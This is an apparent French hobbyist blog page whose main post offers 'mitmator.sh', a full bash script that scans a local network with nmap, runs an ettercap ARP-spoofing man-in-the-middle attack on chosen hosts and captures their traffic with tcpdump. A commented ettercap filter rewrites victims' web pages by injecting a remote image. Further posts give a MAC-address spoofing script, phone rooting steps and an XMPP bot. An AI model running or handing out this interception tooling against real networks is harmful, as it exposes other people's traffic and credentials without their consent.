Hack

MITMator ou comment sniffer votre réseau en une commande

Rédigé par BeHuman - - aucun commentaire

Toujours en perpétuelle apprentissage, en se moment je suis plutot orienté réseaux. Je voulais voir si il été possible de pomper toutes les requêtes web de mon réseau. À ma grande surprise, je suis tombé sur énormément de documention sur tcpdump, nmap, et  ettercap traitant de ce suget. Autant vous dire que ça peut faire peur devil

Comme d'habitude je me suis fait un script (avec ce que j'ai trouver sur le net), qui fait tout tout seul...enfin presque cheeky

Script mitmator.sh:

#! /bin/bash

function sniff() {
    if [[ "$2" != "" ]]; then
        param=" $2"
    else
        param=""
    fi
    echo "tcpdump -i $1 -n -w \"`date +%Y-%m-%d-%H:%M`.dump\" $param"
    tcpdump -i $1 -n -w "`date +%Y-%m-%d-%H:%M`.dump" $param
    kill -9 `cat ettercap.pid`
    echo "Reprise dans 5 secondes..."
    sleep 5
    if [[ "$Mmitm" == "y" ]]; then
        mitm_noread
    fi
    sniff "$1" "$param"
}

function mitm() {
    echo -n "MITM [y/n(default)]? "
    #via le code en commentaire ci-dessous créer un fichier "filter.ett" et ajouter l'option "-F filter.ett" à la commande ettercap "ettercap -T -q -F filter.ett -M ARP $t1 $t2"
    #
    #if (ip.proto == TCP && tcp.dst == 80) {
    #   if (search(DATA.data, "Accept-Encoding")) {
    #      replace("Accept-Encoding", "Accept-Rubbish!"); 
    #	  # note: replacement string is same length as original string
    #      msg("zapped Accept-Encoding!\n");
    #   }
    #}
    #if (ip.proto == TCP && tcp.src == 80) {
    #   replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
    #   replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
    #   msg("Filter Ran.\n");
    #}
    read mitm
    if [[ "$mitm" == "y" ]]; then
        Mmitm="y"
        echo "ex: /192.168.1.1//"
        echo -n "Target 1> "
        read t1
        echo -n "Target 2> "
        read t2
        Tt1=$t1
        Tt2=$t2
        if [[ "$t1" == "" ]]; then 
            t1="///"
            Tt1="///"
        fi
        if [[ "$t2" == "" ]]; then 
            t2="///"
            Tt1="///"
        fi
        echo "ettercap -T -q -i $interface -M ARP:remote $t1 $t2 &"
        ettercap -T -q -i $interface -M ARP:remote $t1 $t2 &
        echo $! > ettercap.pid
        sleep 5
        
        
    fi
}

function mitm_noread() {
        echo "ettercap -T -q -i $interface -M ARP:remote $Tt1 $Tt2 &"
        ettercap -T -q -i $interface -M ARP:remote $Tt1 $Tt2 &
        echo $! > ettercap.pid
        sleep 5
}
Mmitm="n"
Tt1="///"
Tt2="///"
interface=$1
baseip=$2

if [[ "`whoami`" != "root" ]]; then
    sudo $0 $*
    exit 1
else
    if [[ "$1" != "" ]]; then
        interface=$1
        baseip=$2
    else
        interface="eth0"
        baseip="192.168.1.0"
    fi
    
    echo "nmap -sP $baseip/24"
    nmap -sP $baseip/24
    mitm $interface
    if [[ "$3" != "" ]]; then
        if [[ "$3" == "-q" ]]; then
            prm=""
        else
            echo "tcpdump -i $interface -n -w \"`date +%Y-%m-%d-%H:%M`.dump\" $3 \\"
            echo -n "> "
            read prm1
            prm="$3 $prm1"
        fi
    else
        echo "tcpdump -i $interface -n -w \"`date +%Y-%m-%d-%H:%M`.dump\" \\"
        echo -n "> "
        read prm
    fi

    sniff "$interface" "$prm"
fi

 

Pour lancer la commande

mitmator.sh eth0 192.168.1.0
#ou
mitmator.sh wlan0 192.168.2.0 "port 80 or 21"

#pour passer l'étape la demande d'ajout de paramètres
mitmator.sh wlan0 192.168.2.0 -q

 

Le déroulement de MITMator

Pour commencer le script va lancer nmap histoire de vous lister les coquins qui traine sur le réseau:

nmap -sP 192.168.1.0/24

ensuite il vous propose de lancer une attaque MITM (Man in the middle). tapez 'y' et définissez la Target 1> /192.168.1.1// , ensuite laisser vide la Target 2 par défault ça mettra /// .  Ça lance la commande ettercap suivante

ettercap -T -q -i eth0 -M ARP:remote /192.168.1.1// /// &
echo $! > ettercap.pid

pour finir il lance le sniffage avec tcpdump, mais avant il vous propose de rajouter des paramètres à tcpdump

tcpdump -i eth0 -n -w "`date +%Y-%m-%d-%H:%M`.dump" \\
>

cela lancera la récupération et vous crééra un fichier daté .dump que vous pourrez ouvrir avec le logiciel Wireshark. Si le dump coupe il reprendra 5 seconde après. Si vous souhaitez stopper le dump en cours faite ctrl+C il affichera "Reprise dans 5 seconde..." et si vous voulez quitter MITMator refaite ctrl+C

J'ai mis en commentaire dans le code un petit exemple de filtre ettercap (source)...très intéréssant :-P

merci à internet et c'est différents moteurs de recherche, ainsi et surtout aux bloggueurs ayant partagés leurs savoirs et m'ayant permis de faire ce petit script ;-)

++

Modifier votre addresse MAC

Rédigé par BeHuman - - aucun commentaire

Voilà un petit pour changer votre addresse Mac à la volé. Ce script utilise macchanger

 

 

Utilisation:

$ sudo macedit eth0 xx:xx:xx:xx:d6:6e

-----------------------------------------

Current MAC:   xx:xx:xx:xx:c6:1e (GIGA-BYTE TECHNOLOGY CO.,LTD.)

Permanent MAC: xx:xx:xx:xx:c6:1e (GIGA-BYTE TECHNOLOGY CO.,LTD.)

New MAC:       xx:xx:xx:xx:d6:6e (ZyXEL Communications Corporation)

-----------------------------------------

eth0      Link encap:Ethernet  HWaddr xx:xx:xx:xx:d6:6e

          inet adr:192.168.1.30  Bcast:192.168.1.255  Masque:255.255.255.0

          UP BROADCAST MULTICAST  MTU:1500  Metric:1

          RX packets:136102 errors:0 dropped:0 overruns:0 frame:0

          TX packets:71618 errors:0 dropped:0 overruns:0 carrier:0

          collisions:0 lg file transmission:1000 

          RX bytes:108035994 (103.0 MiB)  TX bytes:8380184 (7.9 MiB)


lo        Link encap:Boucle locale  

          inet adr:127.0.0.1  Masque:255.0.0.0

          adr inet6: ::1/128 Scope:Hôte

          UP LOOPBACK RUNNING  MTU:65536  Metric:1

          RX packets:174 errors:0 dropped:0 overruns:0 frame:0

          TX packets:174 errors:0 dropped:0 overruns:0 carrier:0

          collisions:0 lg file transmission:0 

          RX bytes:17108 (16.7 KiB)  TX bytes:17108 (16.7 KiB)
 
Script:
#! /bin/bash

if [[ "`whoami`" != 'root' ]]; then
    echo "restart with root permissions"
    exit 1
fi
exist=`dpkg -l | grep macchanger`
[[ $? -eq 1 ]] && apt-get install macchanger
service network-manager stop
service networking stop
ifconfig $1 down
echo "-----------------------------------------"
macchanger --mac=$2 $1
echo "-----------------------------------------"
ifconfig $1 up
service networking start
service network-manager start
ifconfig
exit 0
++

 

Root Zte Grand X In "StartAddict by SFR"

Rédigé par BeHuman - - aucun commentaire

Salut à tous,

Pour rooté le Zte Grand X In ou StartAddict By SFR il vous suffit de télécharger cette archive data/documents/archives/root_zte_grand_x_in.tar.bz2

Une fois extraite, branchez votre mobile à l'ordinateur via USB en activant le "Débogage USB". Ouvrir un terminal dans le répertoire de l'archive et lancer la comande:

./RunMe.sh

choississez l'option 1 et laissez vous guider jusqu'à la demande de restauration. Effectuez la restauration et laissez le script redémarrer votre téléphone environs 2 fois. Une fois le script terminer, votre tel est Rooté !!!

 

voilii voiloo ++

Lire la suite de Root Zte Grand X In "StartAddict by SFR"

Root DSlide 701r

Rédigé par BeHuman - - aucun commentaire


Je reprend un tutoriel que j'avais posté il ya quelque temps déjà sur FrAndroid à cette adresse:
 http://forum.frandroid.com/topic/84839-tablette-danew-dslide-701r/
bon j'ai dû refaire mon root, car avec toutes mes tentative passé, j'ai foutu un gros bordel >:)
Cependant cela ma permis de faire un petit tuto plus précis que celui que j'avais déposé à la va-vite.

 

Lire la suite de Root DSlide 701r

Xee XMPP Bot

Rédigé par BeHuman - - aucun commentaire

Xee est un bot pour protocole XMPP, Je me suis basé sur le script d'exemple de la doc python-xmpp. Le champs username n'est pas important, il sert juste à savoir quoi afficher comme pseudo : 

Xee Utilise PYTHON-XMPP. Si il n'est pas installé, vous pouvez l'installer via APT:

sudo apt-get install python-xmpp

Exempled ecommande:

$ ./xee compte@jappix.com "123456" "Blaz" "est en train de fumer un clope :P" "est dehors en bas de sa porte d'entrée :)" "./fichier.log"

Lire la suite de Xee XMPP Bot